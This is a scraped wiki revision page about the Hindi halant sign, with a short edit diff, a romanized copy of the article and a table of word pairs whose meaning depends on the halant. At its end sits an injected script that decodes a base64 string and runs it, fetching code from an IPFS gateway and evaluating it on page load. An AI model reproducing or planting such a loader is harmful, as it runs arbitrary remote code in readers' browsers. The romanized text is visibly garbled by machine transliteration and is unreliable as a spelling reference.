Difference between revisions of "हल् का महत्त्व"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
हलन्त किसी वर्ण के आधे होने का एक सूचक चिह्न जो उस वर्ण के नीचे लगाया जाता है। [[स्वर (व्याकरण)|स्वर]] रहित व्यंजन वर्ण, जो किसी शब्द के अन्त में लगाया जाता है। [[व्यंजन (व्याकरण)|व्यञ्जन]] का अर्थ कोई भी सघोष या अघोष ध्वनि है, अथवा "क" से "ह" तक के वर्ण, जिन्हें स्वर की सहायता बिना स्वतन्त्र रूप से उच्चरित करना कठिन है। [[संस्कृत]] में हलन्त का प्रयोग अधिक होता है किन्तु [[हिन्दी]] में भी कुछ शब्द ऐसे हैं जिनमें हलन्त का प्रयोग अनिवार्य है। इस लेख में हल् (हलंत) का महत्त्व दर्शाया गया है।<ref>पुस्तक- हिंदी की वर्तनी, लेखक- संत समीर, पृष्ठ संख्या- 123</ref>
+
हलन्त किसी वर्ण के आधे होने का एक सूचक चिह्न जो उस वर्ण के नीचे लगाया जाता है। [[स्वर (व्याकरण)|स्वर]] रहित व्यंजन वर्ण, जो किसी शब्द के अन्त में लगाया जाता है। [[व्यंजन (व्याकरण)|व्यञ्जन]] का अर्थ कोई भी सघोष या अघोष ध्वनि है, अथवा "क" से "ह" तक के वर्ण, जिन्हें स्वर की सहायता बिना स्वतन्त्र रूप से उच्चरित करना कठिन है। [[संस्कृत]] में हल् चिह्न का प्रयोग अधिक होता है किन्तु [[हिन्दी]] में भी कुछ शब्द ऐसे हैं जिनमें हल् चिह्न का प्रयोग अनिवार्य है। इस लेख में हल् (हलंत) का महत्त्व दर्शाया गया है।<ref>पुस्तक- हिंदी की वर्तनी, लेखक- संत समीर, पृष्ठ संख्या- 123</ref>
 
{{seealso|हल् चिह्न|योजक चिह्न|लाघव चिह्न| लोप चिह्न}}
 
{{seealso|हल् चिह्न|योजक चिह्न|लाघव चिह्न| लोप चिह्न}}
 
{| class="bharattable-pink"
 
{| class="bharattable-pink"

Latest revision as of 06:35, 4 December 2017

halant kisi varn ke adhe hone ka ek soochak chihn jo us varn ke niche lagaya jata hai. svar rahit vyanjan varn, jo kisi shabd ke ant mean lagaya jata hai. vyanjan ka arth koee bhi saghosh ya aghosh dhvani hai, athava "k" se "h" tak ke varn, jinhean svar ki sahayata bina svatantr roop se uchcharit karana kathin hai. sanskrit mean halh chihn ka prayog adhik hota hai kintu hindi mean bhi kuchh shabd aise haian jinamean halh chihn ka prayog anivary hai. is lekh mean halh (halant) ka mahattv darshaya gaya hai.[1]

  1. REDIRECTsaancha:inhean bhi dekhean
shabd arth
jagath sansar
jagat kuean ka chabootara
sanh varsh
san joot
bamh shiv aradhana ka shabd
bam visphotak gola
aantarh aandar
aantar farq
kirtimanh yashasvi
kirtiman rik aaurd
ahamh ahankar
aham khas



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. pustak- hiandi ki vartani, lekhak- sant samir, prishth sankhya- 123

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>